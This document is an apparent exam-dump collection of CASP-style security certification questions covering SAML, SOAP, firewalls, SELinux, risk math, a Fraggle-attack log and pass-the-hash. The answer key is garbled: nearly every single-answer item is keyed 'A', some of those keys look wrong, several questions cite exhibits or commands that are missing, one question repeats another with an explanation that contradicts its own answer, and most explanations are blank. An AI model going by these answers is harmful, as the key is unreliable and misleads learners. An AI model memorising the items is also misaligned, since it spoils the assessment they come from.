QUESTION NO: 309 A security engineer is implementing a new solution designed to process e-business transactions and record them in a corporate audit database. The project has multiple technical stakeholders. The database team controls the physical database resources, the internal audit division controls the audit records in the database, the web hosting team is responsible for implementing the website front end and shopping cart application, and the accounting department is responsible for processing the transaction and interfacing with the payment processor. As the solution owner, the security engineer is responsible for ensuring which of the following? A. Ensure the process functions in a secure manner from customer input to audit review. B. Security solutions result in zero additional processing latency. C. Ensure the process of storing audit records is in compliance with applicable laws. D. Web transactions are conducted in a secure network channel.

Answer: A Explanation:

QUESTION NO: 319 Company XYZ has transferred all of the corporate servers, including web servers, to a cloud hosting provider to reduce costs. All of the servers are running unpatched, outdated versions of Apache. Furthermore, the corporate financial data is also hosted by the cloud services provider, but it is encrypted when not in use. Only the DNS server is configured to audit user and administrator actions and logging is disabled on the other virtual machines. Given this scenario, which of the following is the MOST significant risk to the system? A. All servers are unpatched and running old versions. B. Financial data is processed without being encrypted. C. Logging is disabled on critical servers. D. Server services have been virtualized and outsourced.

Answer: A Explanation:

QUESTION NO: 321 The security administrator is responsible for the confidentiality of all corporate data. The company's servers are located in a datacenter run by a different vendor. The vendor datacenter hosts servers for many different clients, all of whom have access to the datacenter. None of the racks are physically secured. Recently, the company has been the victim of several attacks involving data injection and exfiltatration. The security administrator suspects these attacks are due to several new network based attacks facilitated by having physical access to a system. Which of the following BEST describes how to adapt to the threat? A. Apply port security to all switches, switch to SCP, and implement IPSec tunnels between devices. B. Apply two factor authentication, require point to point VPNs, and enable log auditing on all devices. C. Apply port security to all routers, switch to telnet, and implement point to point VPNs on all servers. D. Apply three factor authentication, implement IPSec, and enable SNMP.

Answer: A Explanation:

QUESTION NO: 329 Staff from the sales department have administrator rights to their corporate standard operating environment, and often connect their work laptop to customer networks when onsite during meetings and presentations. This increases the risk and likelihood of a security incident when the sales staff reconnects to the corporate LAN. Which of the following controls would BEST protect the corporate network? A. Implement a network access control (NAC) solution that assesses the posture of the laptop before granting network access. B. Use an independent consulting firm to provide regular network vulnerability assessments and biannually qualitative risk assessments. C. Provide sales staff with a separate laptop with no administrator access just for sales visits. D. Update the acceptable use policy and ensure sales staff read and acknowledge the policy.

Answer: A Explanation:

QUESTION NO: 337 A company receives a subpoena for email that is four years old. Which of the following should the company consult to determine if it can provide the email in question? A. Data retention policy B. Business continuity plan C. Backup and archive processes D. Electronic inventory

Answer: A Explanation:

QUESTION NO: 340 A company's security policy states that its own internally developed proprietary Internet facing software must be resistant to web application attacks. Which of the following methods provides the MOST protection against unauthorized access to stored database information? A. Require all development to follow secure coding practices. B. Require client-side input filtering on all modifiable fields. C. Escape character sequences at the application tier. D. Deploy a WAF with application specific signatures.

Answer: A Explanation:

QUESTION NO: 344 Which of the following BEST explains SAML? A. A security attestation model built on XML and SOAP-based services, which allows for the exchange of A&A data between systems and supports Federated Identity Management. B. An XML and SOAP-based protocol, which enables the use of PKI for code signing and SSO by using SSL and SSH to establish a trust model. C. A security model built on the transfer of assertions over XML and SOAP-based protocols, which allows for seamless SSO and the open exchange of data. D. A security verification model built on SSO and SSL-based services, which allows for the exchange of PKI data between users and supports XACML.

Answer: A Explanation:

QUESTION NO: 349 A security administrator is tasked with securing a company's headquarters and branch offices move to unified communications. The Chief Information Officer (CIO) wants to integrate the corporate users' email, voice mail, telephony, presence and corporate messaging to internal computers, mobile users, and devices. Which of the following actions would BEST meet the CIO's goals while providing maximum unified communications security? A. Create presence groups, restrict IM protocols to the internal networks, encrypt remote devices, and restrict access to services to local network and VPN clients. B. Enable discretionary email forwarding restrictions, utilize QoS and Secure RTP, allow external IM protocols only over TLS, and allow port 2000 incoming to the internal firewall interface for secure SIP C. Set presence to invisible by default, restrict IM to invite only, implement QoS on SIP and RTP traffic, discretionary email forwarding, and full disk encryption. D. Establish presence privacy groups, restrict all IM protocols, allow secure RTP on session border gateways, enable full disk encryptions, and transport encryption for email security.

Answer: A Explanation:

QUESTION NO: 360 A security administrator at Company XYZ is trying to develop a body of knowledge to enable heuristic and behavior based security event monitoring of activities on a geographically distributed network. Instrumentation is chosen to allow for monitoring and measuring the network. Which of the following is the BEST methodology to use in establishing this baseline? A. Model the network in a series of VMs; instrument the systems to record comprehensive metrics; run a large volume of simulated data through the model; record and analyze results; document expected future behavior. B. Completely duplicate the network on virtual machines; replay eight hours of captured corporate network traffic through the duplicate network; instrument the network; analyze the results; document the baseline. C. Instrument the operational network; simulate extra traffic on the network; analyze net flow information from all network devices; document the baseline volume of traffic. D. Schedule testing on operational systems when users are not present; instrument the systems to log all network traffic; monitor the network for at least eight hours; analyze the results; document the established baseline.

Answer: A Explanation:

QUESTION NO: 365 After being informed that the company DNS is unresponsive, the system administrator issues the following command from a Linux workstation: Once at the command prompt, the administrator issues the below commanD. Which of the following is true about the above situation? A. The administrator must use the sudo command in order to restart the service. B. The administrator used the wrong SSH port to restart the DNS server. C. The service was restarted correctly, but it failed to bind to the network interface. D. The service did not restart because the bind command is privileged.

Answer: A Explanation:

QUESTION NO: 367 Company XYZ has just purchased Company ABC through a new acquisition. A business decision has been made to integrate the two company's networks, application, and several basic services. The initial integration of the two companies has specified the following requirements: Which of the following network security solutions will BEST meet the above requirements? A. Place a Company ABC managed firewall in Company XYZ's hub site; then place Company ABC's file, print, authentication, and secure FTP servers in a zone off the firewall. Ensure that Company ABC's business partner firewalls are opened up for web intranet access and other required services. B. Require Company XYZ to manage the router ACLs, controlling access to Company ABC resources, but with Company ABC approving the change control to the ACLs. Open up Company ABC's business partner firewall to permit access to Company ABC's file, print, secure FTP server, authentication servers and web intranet access. C. Place no restrictions on internal network connectivity between Company XYZ and Company ABC. Open up Company ABC's business partner firewall to permit access to Company ABC's file, print, secure FTP server, authentication servers and web intranet access. D. Place file, print, secure FTP server and authentication domain servers at Company XYZ's hub site. Open up Company ABC's business partner firewall to permit access to ABC's web intranet access and other required services.

Answer: A Explanation:

QUESTION NO: 370 The security administrator has just installed an active\passive cluster of two firewalls for enterprise perimeter defense of the corporate network. Stateful firewall inspection is being used in the firewall implementation. There have been numerous reports of dropped connections with external clients. Which of the following is MOST likely the cause of this problem? A. TCP sessions are traversing one firewall and return traffic is being sent through the secondary firewall and sessions are being dropped. B. TCP and UDP sessions are being balanced across both firewalls and connections are being dropped because the session IDs are not recognized by the secondary firewall. C. Prioritize UDP traffic and associated stateful UDP session information is traversing the passive firewall causing the connections to be dropped. D. The firewall administrator connected a dedicated communication cable between the firewalls in order to share a single state table across the cluster causing the sessions to be dropped.

Answer: A Explanation:

QUESTION NO: 376 A trust relationship has been established between two organizations with web based services. One organization is acting as the Requesting Authority (RA) and the other acts as the Provisioning Service Provider (PSP). Which of the following is correct about the trust relationship? A. The trust relationship uses SAML in the SOAP header. The SOAP body transports the SPML requests / responses. B. The trust relationship uses XACML in the SAML header. The SAML body transports the SOAP requests / responses. C. The trust relationship uses SPML in the SOAP header. The SOAP body transports the SAML requests / responses. D. The trust relationship uses SPML in the SAML header. The SAML body transports the SPML requests / responses.

Answer: A Explanation:

QUESTION NO: 377 A Security Administrator has some concerns about the confidentiality of data when using SOAP. Which of the following BEST describes the Security Administrator's concerns? A. The SOAP header is not encrypted and allows intermediaries to view the header data. The body can be partially or completely encrypted. B. The SOAP protocol supports weak hashing of header information. As a result the header and body can easily be deciphered by brute force tools. C. The SOAP protocol can be easily tampered with, even though the header is encrypted. D. The SOAP protocol does not support body or header encryption which allows assertions to be viewed in clear text by intermediaries.

Answer: A Explanation:

QUESTION NO: 378 Which of the following protocols only facilitates access control? A. XACML B. Kerberos C. SPML D. SAML

Answer: A Explanation:

QUESTION NO: 391 A bank provides single sign on services between its internally hosted applications and externally hosted CRM. The following sequence of events occurs: 1. The banker accesses the CRM system, a redirect is performed back to the organization's internal systems. 2. A lookup is performed of the identity and a token is generated, signed and encrypted. 3. A redirect is performed back to the CRM system with the token. 4. The CRM system validates the integrity of the payload, extracts the identity and performs a lookup. 5. If the banker is not in the system and automated provisioning request occurs. 6. The banker is authenticated and authorized and can access the system. This is an example of which of the following? A. Service provider initiated SAML 2.0 B. Identity provider initiated SAML 1.0 C. OpenID federated single sign on D. Service provider initiated SAML 1.1

Answer: A Explanation:

QUESTION NO: 393 A systems administrator establishes a CIFS share on a Unix device to share data to windows systems. The security authentication on the windows domain is set to the highest level. Windows users are stating that they cannot authenticate to the Unix share. Which of the following settings on the Unix server is the cause of this problem? A. Refuse LM and only accept NTLMv2 B. Accept only LM C. Refuse NTLMv2 and accept LM D. Accept only NTLM

Answer: A Explanation:

QUESTION NO: 394 A Linux security administrator is attempting to resolve performance issues with new software installed on several baselined user systems. After investigating, the security administrator determines that the software is not initializing or executing correctly. For security reasons, the company has implemented trusted operating systems with the goal of preventing unauthorized changes to the configuration baseline. The MOST likely cause of this problem is that SE Linux is set to: A. Enforcing mode with an incorrectly configured policy. B. Enforcing mode with no policy configured. C. Disabled with a correctly configured policy. D. Permissive mode with an incorrectly configured policy.

Answer: A Explanation:

QUESTION NO: 402 During a new desktop refresh, all hosts are hardened at the OS level before deployment to comply with policy. Six months later, the company is audited for compliance to regulations. The audit discovers that 40% of the desktops do not meet requirements. Which of the following is the cause of the noncompliance? A. The devices are being modified and settings are being overridden in production. B. The patch management system is causing the devices to be noncompliant after issuing the latest patches. C. The desktop applications were configured with the default username and password. D. 40% of the devices have been compromised.

Answer: A Explanation:

QUESTION NO: 403 Which of the following does SAML uses to prevent government auditors or law enforcement from identifying specific entities as having already connected to a service provider through an SSO operation? A. Transient identifiers B. Directory services C. Restful interfaces D. Security bindings

Answer: A Explanation:

QUESTION NO: 417 An IT administrator has been tasked by the Chief Executive Officer with implementing security using a single device based on the following requirements: 1. Selective sandboxing of suspicious code to determine malicious intent. 2. VoIP handling for SIP and H.323 connections. 3. Block potentially unwanted applications. Which of the following devices would BEST meet all of these requirements? A. UTM B. HIDS C. NIDS D. WAF E. HSM

Answer: A Explanation:

QUESTION NO: 418 The Chief Executive Officer (CEO) has asked the IT administrator to protect the externally facing web server from SQL injection attacks and ensure the backend database server is monitored for unusual behavior while enforcing rules to terminate unusual behavior. Which of the following would BEST meet the CEO's requirements? A. WAF and DAM B. UTM and NIDS C. DAM and SIEM D. UTM and HSM E. WAF and SIEM

Answer: A Explanation:

QUESTION NO: 427 A security consultant is investigating acts of corporate espionage within an organization. Each time the organization releases confidential information to high-ranking engineers, the information is soon leaked to competing companies. Which of the following techniques should the consultant use to discover the source of the information leaks? A. Digital watermarking B. Steganography C. Enforce non-disclosure agreements D. Digital rights management

Answer: A Explanation:

QUESTION NO: 440 The IT manager is evaluating IPS products to determine which would be most effective at stopping network traffic that contains anomalous content on networks that carry very specific types of traffic. Based on the IT manager's requirements, which of the following types of IPS products would be BEST suited for use in this situation? A. Signature-based B. Rate-based C. Anomaly-based D. Host-based

Answer: A Explanation:

QUESTION NO: 449 An asset manager is struggling with the best way to reduce the time required to perform asset location activities in a large warehouse. A project manager indicated that RFID might be a valid solution if the asset manager's requirements were supported by current RFID capabilities. Which of the following requirements would be MOST difficult for the asset manager to implement? A. The ability to encrypt RFID data in transmission B. The ability to integrate environmental sensors into the RFID tag C. The ability to track assets in real time as they move throughout the facility D. The ability to assign RFID tags a unique identifier

Answer: A Explanation:

QUESTION NO: 456 A small company's Chief Executive Officer (CEO) has asked its Chief Security Officer (CSO) to improve the company's security posture with regard to targeted attacks. Which of the following should the CSO conduct FIRST? A. Survey threat feeds from analysts inside the same industry. B. Purchase multiple threat feeds to ensure diversity and implement blocks for malicious traffic. C. Conduct an internal audit against industry best practices to perform a gap analysis. D. Deploy a UTM solution that receives frequent updates from a trusted industry vendor.

Answer: A Explanation:

QUESTION NO: 463 The manager of the firewall team is getting complaints from various IT teams that firewall changes are causing issues. Which of the following should the manager recommend to BEST address these issues? A. Set up a weekly review for relevant teams to discuss upcoming changes likely to have a broad impact. B. Update the change request form so that requesting teams can provide additional details about the requested changes. C. Require every new firewall rule go through a secondary firewall administrator for review before pushing the firewall policy. D. Require the firewall team to verify the change with the requesting team before pushing the updated firewall policy.

Answer: A Explanation:

QUESTION NO: 126 A new web based application has been developed and deployed in production. A security engineer decides to use an HTTP interceptor for testing the application. Which of the following problems would MOST likely be uncovered by this tool? A. The tool could show that input validation was only enabled on the client side B. The tool could enumerate backend SQL database table and column names C. The tool could force HTTP methods such as DELETE that the server has denied D. The tool could fuzz the application to determine where memory leaks occur

Answer: A Explanation: A HTTP Interceptor is a program that is used to assess and analyze web traffic thus it can be used to indicate that input validation was only enabled on the client side.

QUESTION NO: 136 Joe is a security architect who is tasked with choosing a new NIPS platform that has the ability to perform SSL inspection, analyze up to 10Gbps of traffic, can be centrally managed and only reveals inspected application payload data to specified internal security employees. Which of the following steps should Joe take to reach the desired outcome? A. Research new technology vendors to look for potential products. Contribute to an RFP and then evaluate RFP responses to ensure that the vendor product meets all mandatory requirements. Test the product and make a product recommendation. B. Evaluate relevant RFC and ISO standards to choose an appropriate vendor product. Research industry surveys, interview existing customers of the product and then recommend that the product be purchased. C. Consider outsourcing the product evaluation and ongoing management to an outsourced provider on the basis that each of the requirements are met and a lower total cost of ownership (TCO) is achieved. D. Choose a popular NIPS product and then consider outsourcing the ongoing device management to a cloud provider. Give access to internal security employees so that they can inspect the application payload data. E. Ensure that the NIPS platform can also deal with recent technological advancements, such as threats emerging from social media, BYOD and cloud storage prior to purchasing the product.

Answer: A Explanation: A request for a Proposal (RFP) is in essence an invitation that you present to vendors asking them to submit proposals on a specific commodity or service. This should be evaluated, then the product should be tested and then a product recommendation can be made to achieve the desired outcome.

QUESTION NO: 212 Due to a new regulatory requirement, ABC Company must now encrypt all WAN transmissions. When speaking with the network administrator, the security administrator learns that the existing routers have the minimum processing power to do the required level of encryption. Which of the following solutions minimizes the performance impact on the router? A. Deploy inline network encryption devices B. Install an SSL acceleration appliance C. Require all core business applications to use encryption D. Add an encryption module to the router and configure IPSec

Answer: A Explanation: All WAN transmissions must be encrypted. Encryption uses a lot of processing power on a router to encrypt the outgoing data and decrypt the incoming data. In this question, the routers do not have much processing power. We can minimize the performance impact on the router by offloading the encryption function to another device: an inline network encryption device. This is a hardware device specifically designed to perform the function of data encryption and decryption.

QUESTION NO: 182 A bank has decided to outsource some existing IT functions and systems to a third party service provider. The third party service provider will manage the outsourced systems on their own premises and will continue to directly interface with the bank's other systems through dedicated encrypted links. Which of the following is critical to ensure the successful management of system security concerns between the two organizations? A. ISA B. BIA C. MOU D. SOA E. BPA

Answer: A Explanation: An interconnection security agreement (ISA) is a security document that derails the requirements for establishing, maintaining, and operating an interconnection between systems or networks. It specifies the requirements for connecting the systems and networks and details what security controls are co be used to protect the systems and sensitive data.

QUESTION NO: 225 A new IT company has hired a security consultant to implement a remote access system, which will enable employees to telecommute from home using both company issued as well as personal computing devices, including mobile devices. The company wants a flexible system to provide confidentiality and integrity for data in transit to the company's internally developed application GUI. Company policy prohibits employees from having administrative rights to company issued devices. Which of the following remote access solutions has the lowest technical complexity? A. RDP server B. Client-based VPN C. IPSec D. Jump box E. SSL VPN

Answer: A Explanation: Connecting to a remote desktop server by using a remote desktop connection on a client device is has the lowest technical complexity. Remote Desktop Services (or Remote Desktop Protocol server) is one of the components of Microsoft Windows that allows a user to take control of a remote computer or virtual machine over a network connection. RDS is Microsoft's implementation of thin client, where Windows software and the entire desktop of the computer running RDS, are made accessible to a remote client machine that supports Remote Desktop Protocol (RDP). With RDS, only software user interfaces are transferred to the client system. All input from the client system is transmitted to the server, where software execution takes place.

QUESTION NO: 132 A small company's Chief Executive Officer (CEO) has asked its Chief Security Officer (CSO) to improve the company's security posture quickly with regard to targeted attacks. Which of the following should the CSO conduct FIRST? A. Survey threat feeds from services inside the same industry. B. Purchase multiple threat feeds to ensure diversity and implement blocks for malicious traffic. C. Conduct an internal audit against industry best practices to perform a qualitative analysis. D. Deploy a UTM solution that receives frequent updates from a trusted industry vendor.

Answer: A Explanation: Security posture refers to the overall security plan from planning through to implementation and comprises technical and non-technical policies, procedures and controls to protect from both internal and external threats. From a security standpoint, one of the first questions that must be answered in improving the overall security posture of an organization is to identify where data resides. All the advances that were made by technology make this very difficult. The best way then to improve your company's security posture is to first survey threat feeds from services inside the same industry.

QUESTION NO: 230 A system administrator has just installed a new Linux distribution. The distribution is configured to be "secure out of the box". The system administrator cannot make updates to certain system files and services. Each time changes are attempted, they are denied and a system error is generated. Which of the following troubleshooting steps should the security administrator suggest? A. Review settings in the SELinux configuration files B. Reset root permissions on systemd files C. Perform all administrative actions while logged in as root D. Disable any firewall software before making changes

Answer: A Explanation: Security-Enhanced Linux (SELinux) was created by the United States National Security Agency (NSA) and is a Linux kernel security module that provides a mechanism for supporting access control security policies, including United States Department of Defense-style mandatory access controls (MAC). NSA Security-enhanced Linux is a set of patches to the Linux kernel and some utilities to incorporate a strong, flexible mandatory access control (MAC) architecture into the major subsystems of the kernel. It provides an enhanced mechanism to enforce the separation of information based on confidentiality and integrity requirements, which allows threats of tampering and bypassing of application security mechanisms to be addressed and enables the confinement of damage that can be caused by malicious or flawed applications.

QUESTION NO: 148 The risk manager at a small bank wants to use quantitative analysis to determine the ALE of running a business system at a location which is subject to fires during the year. A risk analyst reports to the risk manager that the asset value of the business system is $120,000 and, based on industry data, the exposure factor to fires is only 20% due to the fire suppression system installed at the site. Fires occur in the area on average every four years. Which of the following is the ALE? A. $6,000 B. $24,000 C. $30,000 D. $96,000

Answer: A Explanation: Single Loss Expectancy (SLE) is mathematically expressed as: Asset value (AV) x Exposure Factor (EF) SLE = AV x EF = $120 000 x 20% = $ 24,000 (this is over 4 years) Thus ALE = $ 24,000 / 4 = $ 6,000 References: http://www.financeformulas.net/Return_on_Investment.html https://en.wikipedia.org/wiki/Risk_assessment Project Management Institute, A Guide to the Project Management Body of Knowledge (PMBOK Guide), 5th Edition, Project Management Institute, Inc., Newtown Square, 2013, p. 198 McMillan, Troy and Robin Abernathy, CompTIA Advanced Security Practitioner (CASP) CAS-002 Cert Guide, Pearson Education, Indianapolis, 2015, p. 305

QUESTION NO: 223 VPN users cannot access the active FTP server through the router but can access any server in the data center. Additional network information: DMZ network - 192.168.5.0/24 (FTP server is 192.168.5.11) VPN network - 192.168.1.0/24 Datacenter - 192.168.2.0/24 User network - 192.168.3.0/24 HR network - 192.168.4.0/24\ Traffic shaper configuration: VLANBandwidth Limit (Mbps) VPN50 User175 HR250 Finance250 Guest0 Router ACL: ActionSourceDestination Permit192.168.1.0/24192.168.2.0/24 Permit192.168.1.0/24192.168.3.0/24 Permit192.168.1.0/24192.168.5.0/24 Permit192.168.2.0/24192.168.1.0/24 Permit192.168.3.0/24192.168.1.0/24 Permit192.168.5.1/32192.168.1.0/24 Deny192.168.4.0/24192.168.1.0/24 Deny192.168.1.0/24192.168.4.0/24 Denyanyany Which of the following solutions would allow the users to access the active FTP server? A. Add a permit statement to allow traffic from 192.168.5.0/24 to the VPN network B. Add a permit statement to allow traffic to 192.168.5.1 from the VPN network C. IPS is blocking traffic and needs to be reconfigured D. Configure the traffic shaper to limit DMZ traffic E. Increase bandwidth limit on the VPN network

Answer: A Explanation: The FTP Server is in the DMZ network (192.168.5.0/24). VPN users connect to the VPN network (192.168.1.0/24) We have a firewall rule which allows traffic from the VPN network to the DMZ network as shown below. Permit192.168.1.0/24192.168.5.0/24 However, we do not have a rule allowing traffic going the other way. This means that FTP requests will reach the FTP server but any response from the FTP server back to a VPN user's computer will be blocked at the firewall. The solution is to allow the return traffic by adding a permit statement to allow traffic from 192.168.5.0/24 (the DMZ network) to the VPN network. Such a rule would look like the rule shown below: Permit192.168.5.0/24192.168.1.0/24

QUESTION NO: 110 The Information Security Officer (ISO) believes that the company has been targeted by cybercriminals and it is under a cyber attack. Internal services that are normally available to the public via the Internet are inaccessible, and employees in the office are unable to browse the Internet. The senior security engineer starts by reviewing the bandwidth at the border router, and notices that the incoming bandwidth on the router's external interface is maxed out. The security engineer then inspects the following piece of log to try and determine the reason for the downtime, focusing on the company's external router's IP which is 128.20.176.19: 11:16:22.110343 IP 90.237.31.27.19 > 128.20.176.19.19: UDP, length 1400 11:16:22.110351 IP 23.27.112.200.19 > 128.20.176.19.19: UDP, length 1400 11:16:22.110358 IP 192.200.132.213.19 > 128.20.176.19.19: UDP, length 1400 11:16:22.110402 IP 70.192.2.55.19 > 128.20.176.19.19: UDP, length 1400 11:16:22.110406 IP 112.201.7.39.19 > 128.20.176.19.19: UDP, length 1400 Which of the following describes the findings the senior security engineer should report to the ISO and the BEST solution for service restoration? A. After the senior engineer used a network analyzer to identify an active Fraggle attack, the company's ISP should be contacted and instructed to block the malicious packets. B. After the senior engineer used the above IPS logs to detect the ongoing DDOS attack, an IPS filter should be enabled to block the attack and restore communication. C. After the senior engineer used a mirror port to capture the ongoing amplification attack, a BGP sinkhole should be configured to drop traffic at the source networks. D. After the senior engineer used a packet capture to identify an active Smurf attack, an ACL should be placed on the company's external router to block incoming UDP port 19 traffic.

Answer: A Explanation: The exhibit displays logs that are indicative of an active fraggle attack. A Fraggle attack is similar to a smurf attack in that it is a denial of service attack, but the difference is that a fraggle attack makes use of ICMP and UDP ports 7 and 19. Thus when the senior engineer uses a network analyzer to identify the attack he should contact the company's ISP to block those malicious packets.

QUESTION NO: 161 A completely new class of web-based vulnerabilities has been discovered. Claims have been made that all common web-based development frameworks are susceptible to attack. Proof-ofconcept details have emerged on the Internet. A security advisor within a company has been asked to provide recommendations on how to respond quickly to these vulnerabilities. Which of the following BEST describes how the security advisor should respond? A. Assess the reliability of the information source, likelihood of exploitability, and impact to hosted data. Attempt to exploit via the proof-of-concept code. Consider remediation options. B. Hire an independent security consulting agency to perform a penetration test of the web servers. Advise management of any 'high' or 'critical' penetration test findings and put forward recommendations for mitigation. C. Review vulnerability write-ups posted on the Internet. Respond to management with a recommendation to wait until the news has been independently verified by software vendors providing the web application software. D. Notify all customers about the threat to their hosted data. Bring the web servers down into "maintenance mode" until the vulnerability can be reliably mitigated through a vendor patch.

Answer: A Explanation: The first thing you should do is verify the reliability of the claims. From there you can assess the likelihood of the vulnerability affecting your systems. If it is determined that your systems are likely to be affected by the exploit, you need to determine what impact an attack will have on your hosted data. Now that you know what the impact will be, you can test the exploit by using the proof-of-concept code. That should help you determine your options for dealing with the threat (remediation).

QUESTION NO: 103 A critical system audit shows that the payroll system is not meeting security policy due to missing OS security patches. Upon further review, it appears that the system is not being patched at all. The vendor states that the system is only supported on the current OS patch level. Which of the following compensating controls should be used to mitigate the vulnerability of missing OS patches on this system? A. Isolate the system on a secure network to limit its contact with other systems B. Implement an application layer firewall to protect the payroll system interface C. Monitor the system's security log for unauthorized access to the payroll application D. Perform reconciliation of all payroll transactions on a daily basis

Answer: A Explanation: The payroll system is not meeting security policy due to missing OS security patches. We cannot apply the patches to the system because the vendor states that the system is only supported on the current OS patch level. Therefore, we need another way of securing the system. We can improve the security of the system and the other systems on the network by isolating the payroll system on a secure network to limit its contact with other systems. This will reduce the likelihood of a malicious user accessing the payroll system and limit any damage to other systems if the payroll system is attacked.

QUESTION NO: 219 Which of the following BEST constitutes the basis for protecting VMs from attacks from other VMs hosted on the same physical platform? A. Aggressive patch management on the host and guest OSs. B. Host based IDS sensors on all guest OSs. C. Different antivirus solutions between the host and guest OSs. D. Unique Network Interface Card (NIC) assignment per guest OS.

Answer: A Explanation: This question is asking "Which of the following BEST constitutes the basis for protecting VMs from attacks from other VMs hosted on the same physical platform. In other words, what is the primary method protecting VMs. The first thing we should do to protect the VMs is to ensure that the guest OS's are patched and ensure that the host is patched. The host provides the virtualization software to enable the running of the virtual machines. Any floors in the virtualization software that affect the VM separation enabling an attack between VMs running on the host would hopefully be fixed by the virtualization software vendor in a patch. The most important step and therefore "the basis" for protecting VMs would be aggressive patch management.

QUESTION NO: 199 Three companies want to allow their employees to seamlessly connect to each others wireless corporate networks while keeping one consistent wireless client configuration. Each company wants to maintain its own authentication infrastructure and wants to ensure that an employee who is visiting the other two companies is authenticated by the home office when connecting to the other companies' wireless network. All three companies have agreed to standardize on 802.1x EAP-PEAP-MSCHAPv2 for client configuration. Which of the following should the three companies implement? A. The three companies should agree on a single SSID and configure a hierarchical RADIUS system which implements trust delegation. B. The three companies should implement federated authentication through Shibboleth connected to an LDAP backend and agree on a single SSID. C. The three companies should implement a central portal-based single sign-on and agree to use the same CA when issuing client certificates. D. All three companies should use the same wireless vendor to facilitate the use of a shared cloud based wireless controller.

Answer: A Explanation: To enable "employees to seamlessly connect to each others wireless corporate networks while keeping one consistent wireless client configuration", the wireless networks must all use the same SSID. We should use RADIUS (Remote Authentication Dial-In User Service). RADIUS is a protocol that was originally used to authenticate users over dialup connections, but is increasingly used for other authentication scenarios, including the wireless network. A RADIUS hierarchy with delegated trust will enable a user connecting to one company wireless network (not his home company network) to be authenticated by the RADIUS server in his home network. For example: if a user from Company A connects to the wireless network in Company C, the Company C RADIUS server will see that the user is not from Company A and forward the authentication request to the RADIUS server in Company A.

QUESTION NO: 102 A risk manager has decided to use likelihood and consequence to determine the risk of an event occurring to a company asset. Which of the following is a limitation of this approach to risk management? A. Subjective and based on an individual's experience. B. Requires a high degree of upfront work to gather environment details. C. Difficult to differentiate between high, medium, and low risks. D. Allows for cost and benefit analysis. E. Calculations can be extremely complex to manage.

Answer: A Explanation: Using likelihood and consequence to determine risk is known as qualitative risk analysis. With qualitative risk analysis, the risk would be evaluated for its probability and impact using a numbered ranking system such as low, medium, and high or perhaps using a 1 to 10 scoring system. After qualitative analysis has been performed, you can then perform quantitative risk analysis. A Quantitative risk analysis is a further analysis of the highest priority risks during which a numerical or quantitative rating is assigned to the risk. Qualitative risk analysis is usually quick to perform and no special tools or software is required. However, qualitative risk analysis is subjective and based on the user's experience.

QUESTION NO: 111 An external penetration tester compromised one of the client organization's authentication servers and retrieved the password database. Which of the following methods allows the penetration tester to MOST efficiently use any obtained administrative credentials on the client organization's other systems, without impacting the integrity of any of the systems? A. Use the pass the hash technique B. Use rainbow tables to crack the passwords C. Use the existing access to change the password D. Use social engineering to obtain the actual password

Answer: A Explanation: With passing the hash you can grab NTLM credentials and you can manipulate the Windows logon sessions maintained by the LSA component. This will allow you to operate as an administrative user and not impact the integrity of any of the systems when running your tests.

QUESTION NO: 256 A security consultant is called into a small advertising business to recommend which security policies and procedures would be most helpful to the business. The business is comprised of 20 employees, operating off of two shared servers. One server houses employee data and the other houses client data. All machines are on the same local network. Often these employees must work remotely from client sites, but do not access either of the servers remotely. Assuming no security policies or procedures are in place right now, which of the following would be the MOST applicable for implementation? (Select TWO). A. Password Policy B. Data Classification Policy C. Wireless Access Procedure D. VPN Policy E. Database Administrative Procedure

Answer: A,B Explanation:

QUESTION NO: 343 An administrator receives a notification from legal that an investigation is being performed on members of the finance department. As a precaution, legal has advised a legal hold on all documents for an unspecified period of time. Which of the following policies will MOST likely be violated? (Select TWO). A. Data Storage Policy B. Data Retention Policy C. Corporate Confidentiality Policy D. Data Breach Mitigation Policy E. Corporate Privacy Policy

Answer: A,B Explanation:

QUESTION NO: 202 A security company is developing a new cloud-based log analytics platform. Its purpose is to allow: Customers to upload their log files to the "big data" platform Customers to perform remote log search Customers to integrate into the platform using an API so that third party business intelligence tools can be used for the purpose of trending, insights, and/or discovery Which of the following are the BEST security considerations to protect data from one customer being disclosed to other customers? (Select THREE). A. Secure storage and transmission of API keys B. Secure protocols for transmission of log files and search results C. At least two years retention of log files in case of e-discovery requests D. Multi-tenancy with RBAC support E. Sanitizing filters to prevent upload of sensitive log file contents F. Encryption of logical volumes on which the customers' log files reside

Answer: A,B,D Explanation: The cloud-based log analytics platform will be used by multiple customers. We should therefore use a multi-tenancy solution. Multi-tenancy isolates each tenant's (customer's) services, jobs, and virtual machines from other tenants. RBAC (Role-Based Access Control) is used to assign permissions to each user. Roles are defined which have specific sets of permissions. Users are then assigned one or more roles according to what permissions they need (what roles they need to perform). Secure protocols for transmission of log files and search results: this is obvious. A secure protocol such as SSL/TLS should be used for the transmission of any sensitive data to prevent the data being captured by packet sniffing attacks. Encryptions keys used to access the API should be kept securely and transmitted securely. If a user is able to access another customer's key, the users could access the other customer's data.

QUESTION NO: 399 A large bank deployed a DLP solution to detect and block customer and credit card data from leaving the organization via email. A disgruntled employee was able to successfully exfiltrate data through the corporate email gateway by embedding a word processing document containing sensitive data as an object in a CAD file. Which of the following BEST explains why it was not detected and blocked by the DLP solution? (Select TWO). A. The product does not understand how to decode embedded objects. B. The embedding of objects in other documents enables document encryption by default. C. The process of embedding an object obfuscates the data. D. The mail client used to send the email is not compatible with the DLP product. E. The DLP product cannot scan multiple email attachments at the same time.

Answer: A,C Explanation:

QUESTION NO: 401 A company has been purchased by another agency and the new security architect has identified new security goals for the organization. The current location has video surveillance throughout the building and entryways. The following requirements must be met: 1. Ability to log entry of all employees in and out of specific areas 2. Access control into and out of all sensitive areas 3. Two-factor authentication Which of the following would MOST likely be implemented to meet the above requirements and provide a secure solution? (Select TWO). A. Proximity readers B. Visitor logs C. Biometric readers D. Motion detection sensors E. Mantrap

Answer: A,C Explanation:

QUESTION NO: 408 A large international business has completed the acquisition of a small business and it is now in the process of integrating the small business' IT department. Both parties have agreed that the large business will retain 95% of the smaller business' IT staff. Additionally, the larger business has a strong interest in specific processes that the smaller business has in place to handle its regional interests. Which of the following IT security related objectives should the small business' IT staff consider reviewing during the integration process? (Select TWO). A. How the large business operational procedures are implemented. B. The memorandum of understanding between the two businesses. C. New regulatory compliance requirements. D. Service level agreements between the small and the large business. E. The initial request for proposal drafted during the merger. F. The business continuity plan in place at the small business.

Answer: A,C Explanation:

